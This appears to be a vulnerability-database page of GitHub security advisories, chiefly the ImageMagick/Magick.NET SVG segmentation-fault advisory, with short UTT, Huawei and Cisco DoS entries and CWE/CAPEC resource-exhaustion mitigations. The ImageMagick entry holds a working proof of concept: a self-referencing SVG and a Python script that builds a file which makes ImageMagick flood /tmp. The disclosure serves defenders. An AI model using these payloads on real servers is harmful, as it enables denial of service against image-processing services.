        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-OpenMP-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q16-HDRI-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-AnyCPU"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-OpenMP-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-arm64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x64"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.3.0"
      },
      "package": {
        "ecosystem": "NuGet",
        "name": "Magick.NET-Q8-x86"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "13.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-1289"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-12T20:30:45Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nSpecially crafted SVG file make segmentation fault and generate trash files in \"/tmp\", possible to leverage DoS.\n\n### Operating system, version and so on\n\nLinux,  Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara)\n\n### Tested ImageMagick version\n\n6.9.11-60, 7.1.0-62\n\n### Details\nA specially created SVG file that loads by itself and make segmentation fault. Remote attackers can take advantage of this vulnerability to cause a denial of service of the generated SVG file.\n\nIt seems that this error affects a lot of websites and causes a generating trash files in ```/tmp``` when uploading this PC file to the server.\n\nI think it\u0027s better to check the file descriptor coming from itself before executing ```read()```.\n\n### PoC\n1. Generate SVG file:\n```\u003c?xml version=\"1.0\" standalone=\"yes\"?\u003e\n\u003c!DOCTYPE test\u003e\n\u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n\u003cimage height=\"200\" width=\"200\" xlink:href=\"bad.svg\" /\u003e\n\u003c/svg\u003e\n```\n2. Run some commands for verification:\n```$rm -f /tmp/*\n$./magick --version\nVersion: ImageMagick 7.1.0-62 Q16-HDRI x86_64 74b3683a4:20230211 https://imagemagick.org\nCopyright: (C) 1999 ImageMagick Studio LLC\nLicense: https://imagemagick.org/script/license.php\nFeatures: Cipher DPC HDRI OpenMP(4.5) \nDelegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib\nCompiler: gcc (7.5)\n$./magick convert -verbose -font OpenSymbol bad.svg t.jpg\n\u0027inkscape\u0027 \u0027/tmp/magick-ixX13JwrwrLUhyucKsGxechsQtEN4Zji\u0027 --export-filename=\u0027/tmp/magick-qp154V6U-dyAwtU-QbcnWD8XKFcG7q5k.png\u0027 --export-dpi=\u002796\u0027 --export-background=\u0027rgb(100%,100%,100%)\u0027 --export-background-opacity=\u00271\u0027 \u003e \u0027/tmp/magick-YWdlPJt-_9BfRq0uY2vmza_VOxWfjyvl\u0027 2\u003e\u00261\nSegmentation fault\n$ls /tmp\nmagick-1iZstE-dzlzQTN4HkWX_JlakXXtH4IEM  magick-GeFwj8Be_wISDLJnsr4s5WC7p079pzXN  magick-s7QN2tTaiXEr9KmkbkHdmtfmgrnjFRaM\nmagick-1LG0ND-RZMQOG8xizDHd-qdd6_Fu70YP  magick-ggORXwnSivWesH2gthhafuLTVw7TLqwP  magick-s835rBXZIGK5bkp3ijKoMTCbcyWza3ON\nmagick-25byX_oEeEr2dWIkr9nyEoVz1MHC2n9M  magick-GrRg60fY1LOv4uUhqD16AaEcL6rWtNeN  magick-siS7QS_av31X63ENYmecytIjx1iKmWAN\nmagick-2Dj7LuLUHF6Y93mZ9ZT8a5taf7b5Hb9O  magick-gTQUBafZIaI1n8q-QXOwOvyc6qv3tolN  magick-SIXvVjWVvDhX1w5NL9K6owJtO0CgG3NN\nmagick-2GrJuPlQjwGwsTK8I1aTMxg90h8PeK4M  magick-hik3AU_2x0D_R8ViIBXUIuRljCXSmgqO  magick-sJhO2Yv_aeKsxt1JxDENKIiQqkOkSfwM\nmagick-2QIFnR9e-fYRFevd1-vQ-bSk0I1VOAsO  magick-HJ18uyG3HLvEftNcMqCEJ5LKwi12CQgO  magick-SNgGdhyKjp5TZZQmWqioLEcyQ8vMzG3O\nmagick-2rEueYW0PIXGxE1zHm3LsGedMW2KLdgP  magick-hUaNDJgYfzTzJes4QlnLwaYh2fcaOWgQ  magick-SxLBCSdKVHSQOrjohe4WFyLHaPOyDUiP\nmagick-2uRqbAjqkXXMMGQHpw8WG18lnDHaRd3N  magick-_HWqrSdj_ihWMzjJ_eRiAkKbgrIljhUM  magick-t02HQvZSsYLzmJesC2Mpjp5OL3zN4A5P\nmagick-3dPT4h0HzM6ZqCwpGEB69e27pZhHbfHP  magick-iEMFbMc2VvGj067miVskUC-mxOveGpqO  magick-T4kTJGu-6wF60OOIHOB5tKO63NW5qTTL\nmagick-3SVSiI4Yg_eQ01ZZV8lZsBM_MhauuwpO  magick-InCjmKQ7uSGizlJFOZz9Vo3Ax1yvLy5L  magick-TGIY7l3-dNVdAbGaMIbN0z3YGy5mrNvM\nmagick-3WQIQghdu9-YHVasNASfkkU63yyVdmfO  magick-IPu9YWX3Lk96EkP63KLqQ-CX6020cZMN  magick-Thg6M-CqdcXc0SyjRdYm19rtVBLt2U6P\nmagick-4hLf4JPIes67QpGP7GfmOPftGvENC1aN  magick-IVKuPYBpBe6Lx9F3lLMAMCjIptMoz0ZM  magick-TiTtPZdT3Zgsd-pasyRFTb-DbLGNqJTO\nmagick-4tTMAJrCHh2E8M1xw5BIjx8UDyb42FWM  magick-IVzovwQiOR2fwJDO5E5RZb58apCPBX8M  magick-_TQZIwyyLufZWMVx1-k3YLSYSsGl6upM\nmagick-4xs5mqt95PYGrXXxZiwyYHFKREC0NEWL  magick-J36psEABfkKfgVQdeFsptbkRWT0b1uNP  magick-tzMg0NWi-_GQOzES2aPMPRqCk-bgjyVN\nmagick-5DmloHI-m-WPROyfQmm5cF8GOEVa5EqO  magick-jEq-Q6t6D3CU-eevjhgfjU_LPP3pOEoO  magick-ULNarZD53mUqpJrHZVeZw5x0cuUH683N\nmagick-5JvQUY2vVq_kpzhfUTcsxao_YB2WImZN  magick-jNiokVz_0Iifz5QX3a9AUIUOBoxfJ49P  magick-uLR13qPG6X-c3avLRypLJ-C7-UiUH9tM\nmagick-5NoXNg55Xyh8816ksKEcqreuN1BF93LO  magick-jwa4IVvrxrE4OTSA0m8iB2W3K5LiinmQ  magick-uW9khwJZfM4EH1cETVDv09QnueONQGPP\nmagick-60BRKi88--TOk-Sp8t5nAyAxjSuOpxfO  magick-K5mhLUCkx0WJxcWr7G7oT0nNrc5qBvgQ  magick-v4l3nLHBXBjCNc-nTHSTwUOEfsNCUMnP\nmagick-6t2qB_JnplYLZZo5thj6PV0R15LrPe4L  magick-K5qzx3k8-36H5wfEgl3Jy1oNpOyscHhN  magick-v7Xm_e5JIf4lCC_CwXJkIuQNHEE7D1LM\nmagick-6_UmuyWO8OviaajA92_VeD1bK8z0btAO  magick-K6-l4o2PkC4V7Nq_IJ9y-ifJLl6lSzdM  magick-vd7xpM8OrXvu3Oftqd7xdRmGDdoGcHrP\nmagick-725dkkTfpkfKmogI4WLWWwCbrxc0aysP  magick-KchLIwf4-ahsUq1FsJfK58j3Jb6CAMTP  magick-VhfNmWGF-AOhytm1DMGG8n1DLOAG3p1N\nmagick-7rZG_PFyH2Q7ibxFrB4kTQZjkihhU9uO  magick-kpcUuOTI4UlrK8kHoZh38ziLMmBjtjvO  magick-vHp_Pz6BixbqmYCq_D2zs2sU4hFRbQoP\nmagick--7T1tmKSEJSSPJIgeDEQ9PLdo8oPh60P  magick-kReWGvubeCrLdw4RcRsJdJhlV43wCffM  magick-VLoWnTJppgO7-ivh0q_uuGcgPDkuyKPN\nmagick-8jBguKQr6qeZTsw4eFbQWO34ndlsBpbO  magick-LBjQNSTFFpLRnj3Cldvjm5e_PWYL1fLL  magick-Vp_vOIJK-XsFRZeAS1ZJ9Ra2vkgJbCOL\nmagick-9Hno6LBapbL0jw_CSEC7Ua6A7kB3uYiN  magick-Lfu-5C1697AwNxTZnljfR24E2_7ZDnwP  magick-VpzT9KMjKbomi6mV3ZnnRkoq1WAP41vM\nmagick-9SN2401usIEYCc6zcn442pdvqyVdPWaQ  magick-lHxUfKDHYSfpVi7yOc31u7gJVTXLhSuN  magick-vRG2_rcf6I8lB2MJF6DqHqh2_z21IP5N\nmagick-a1uVHLsbEnA8yXKvwmW3PWAFBdnfoSnQ  magick-M4mcsykxHPNkFTDgc4tdJ9kP1Trkm64M  magick-vw2VNrClFVhnXLqVoIz35Xpo232qsngN\nmagick-AbpJUZcspor3bkYr70l17bGSjntyAhZP  magick-m5P0dZWaFUeZo4kr8HcO6vpfuICmmBcM  magick-WEYdL0amRHxeCpuGiFEuulRwwzkjZyXO\nmagick-Acsy_QEmT-x7nE6DvfIv2pqjLbfJYTtN  magick-MHI0zAFGR1-ljbFLl12i5hFVpkoBbdpN  magick-WKjEe_jTF4V6Jt_kCbFEy2B6kQcyFseQ\nmagick-Ai76_QfTBT0DXjGqvZ_aAGia_gvAxuGM  magick-mOckd_uEYCLc9gy1XwVgtJWpr1aDU7QP  magick-WkkwqgsnNNSleWlRm-1BN8RiE-QcF9lO\nmagick-albf_l7tU2ASh6PRhnMWBDscz31fS1BO  magick-MrajCpsti_3MlAWlNviDCY3iUeZsgGLM  magick-WMlxV7rdjtMYe1F0aggQZW2WNpvhY2GO\nmagick-A-nsLcvOOBlHzdBGQMSsdTrvsfUevEQO  magick-mZyca0hC8atGLvY-m0UYec1yCU3rGIWM  magick-wnqAodNT7ZVbe8dIN-Gd2pxCNo6cwzOL\nmagick-AplCAOC7_K6cDM3qO3wqSONMhVuztohO  magick-NAH0CgD3XCLMS1VN_-4yju-2RCdFJbGO  magick-wP3Q3aM05wB2K6NBolzm6sC_R3b5wE1P\nmagick-ApNw8tmuaXUw-mqdMF7P0ZKOV3YHwQGM  magick-NU3oGX5NxUhJvWQ_WWY8-7BNAnHWJceM  magick-wsCa-R-K6HYtZ7FWWnPg3FpOyGmS1wuO\nmagick-AWye85xaEc_t6rGB9bIvIz9BBhrRyg3O  magick-NZBKgJGx7bH8uZ2PiKF8jtzCI9aBDVZN  magick-WvNjMMQ2gXHSGNWCMceMqBL8ksnGZIuO\nmagick-aXtmFaHIdz24xjFvCy4ZQda2wef0AH0N  magick-o3FerPGSptnb0U5mHu6DH-00ZTlTlDCO  magick-xAPfisi5E9NHJKbkrbCGioXCkTs3uDYM\nmagick-B5uiXH3Mrf0GgmF9NAPwqSJd-lMFLfrM  magick-o4Dl5iYn3veI54-lNtHgm6wnAIQ79urP  magick-Xb2irJZuxzYWsCfmYHc8oaKU67ANR27N\nmagick-BEr6_VZecWKFCRVuSXPEIbJu6uuBe0pO  magick-o9S5taGlSrED8zUEtv0EkpjoWk61fJBO  magick-Xkes-Q_QqXhMthGwFKxLjpRvL96qRd6O\nmagick-bKCtVcSkQqtXdjO8X_AyWeocMsYuZArN  magick-OeHngPf0pRuDH9DpIs_OpkoAbDnAvBTL  magick-xlhsal9kyY6QMOSb1WmyTx1vGTqE94bO\nmagick-Btw2-hfTAVQLiPRMXakrXs_UhstT2ZGM  magick-OhD82cIFbY91zGxpIt52AbjWekddAU2L  magick-xmmr39PvOExl0B8w0YO_oq2_yYyWoVLM\nmagick-By2_pnDUxk85bO3M7kkMbAEXHGShyc0O  magick-OlcHbZjE_-66xMyWVlhfAucxYJioiQ4L  magick-xq9qw9wK-TRFokBTostne36jQXljCa7M\n...\n```\n\n### Impact\nPossible DOS, because when ImageMagick crashes it generates a lot of trash files. This trash file can be large, if SVG file contains many render action.\n\n### Additional impact\nIn DOS attack if remount attacker uploads an SVG file of size t, ImageMagick generates files of size 103*t. This means that if an attacker uploads a 100 M SVG, the server will generate about 10 G.\n\nExample:\n```\n$cat dos_poc.py \nopen(\"bad_dos.svg\", \"w\").write(\"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003c?xml-stylesheet href=\"https://example.com/style.xsl\" type=\"text/xsl\" ?\u003e\n\u003c!DOCTYPE test\u003e\n\u003csvg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"\u003e\n\u003cimage height=\"200\" width=\"200\" href=\"bad_dos.svg\u0026quot;\"\"\" + \"0\"*(1024*1021) +  \"\"\"\u0026quot;\" /\u003e\n\u003c/svg\u003e\"\"\")\n$rm -rf /tmp/magick-*\n$python3 dos_poc.py\n$du -h bad_dos.svg\n1,0M\tbad_dos.svg\n$../magick convert -font OpenSymbol bad_dos.svg t.jpg \nSegmentation fault\n$cat /tmp/magick-* \u003e dos_k.txt\n$du -h dos_k.txt \n103M\tdos_k.txt\n```\n\nP. S. If ImageMagick will work in Docker container this attack will crash server where docker running. Because the size of the docker container will increase.",
  "id": "GHSA-j96m-mjp6-99xr",
  "modified": "2026-03-12T20:30:45Z",
  "published": "2026-03-12T20:30:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-j96m-mjp6-99xr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1289"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/commit/c5b23cbf2119540725e6dc81f4deb25798ead6a4"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2176858"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ImageMagick/ImageMagick"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00007.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ImageMagick: Specially crafted SVG leads to segmentation fault and generate trash files in \"/tmp\", possible to leverage DoS"
}

GHSA-J9WF-C8WX-6M8M

Vulnerability from github – Published: 2026-07-02 21:32 – Updated: 2026-07-06 18:30
VLAI
Details

An issue in UTT nv518G nv518GV3v3.2.7-210919-161313 allows a remote attacker to cause a denial of service via the gohead/sub_445C5C component

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-52192"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-02T21:16:56Z",
    "severity": "HIGH"
  },
  "details": "An issue in UTT nv518G nv518GV3v3.2.7-210919-161313 allows a remote attacker to cause a denial of service via the gohead/sub_445C5C component",
  "id": "GHSA-j9wf-c8wx-6m8m",
  "modified": "2026-07-06T18:30:42Z",
  "published": "2026-07-02T21:32:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-52192"
    },
    {
      "type": "WEB",
      "url": "https://github.com/akuma-QAQ/CVEreport/tree/main/518G/FUN_00445c5c"
    },
    {
      "type": "WEB",
      "url": "https://utt.com.cn/downloadcenter.php?filetypeid=3\u0026model=518G\u0026lang=zhcn"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JC3V-29VJ-6W26

Vulnerability from github – Published: 2022-05-14 03:43 – Updated: 2022-05-14 03:43
VLAI
Details

Huawei Smartphones with software LON-L29DC721B186 have a denial of service vulnerability. An attacker could make an loop exit condition that cannot be reached by sending the crafted 3GPP message. Successful exploit could cause the device to reboot.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-15345"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-02-15T16:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Huawei Smartphones with software LON-L29DC721B186 have a denial of service vulnerability. An attacker could make an loop exit condition that cannot be reached by sending the crafted 3GPP message. Successful exploit could cause the device to reboot.",
  "id": "GHSA-jc3v-29vj-6w26",
  "modified": "2022-05-14T03:43:42Z",
  "published": "2022-05-14T03:43:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15345"
    },
    {
      "type": "WEB",
      "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171108-01-smartphone-en"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-JC4F-W7G4-MHXV

Vulnerability from github – Published: 2022-05-13 01:34 – Updated: 2022-05-13 01:34
VLAI
Details

A vulnerability in Cisco 900 Series Aggregation Services Router (ASR) software could allow an unauthenticated, remote attacker to cause a partial denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient handling of certain broadcast packets ingress to the device. An attacker could exploit this vulnerability by sending large streams of broadcast packets to an affected device. If successful, an exploit could allow an attacker to impact services running on the device, resulting in a partial DoS condition.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-15464"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-01-11T15:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in Cisco 900 Series Aggregation Services Router (ASR) software could allow an unauthenticated, remote attacker to cause a partial denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient handling of certain broadcast packets ingress to the device. An attacker could exploit this vulnerability by sending large streams of broadcast packets to an affected device. If successful, an exploit could allow an attacker to impact services running on the device, resulting in a partial DoS condition.",
  "id": "GHSA-jc4f-w7g4-mhxv",
  "modified": "2022-05-13T01:34:13Z",
  "published": "2022-05-13T01:34:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-15464"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-asr900-dos"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/106550"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.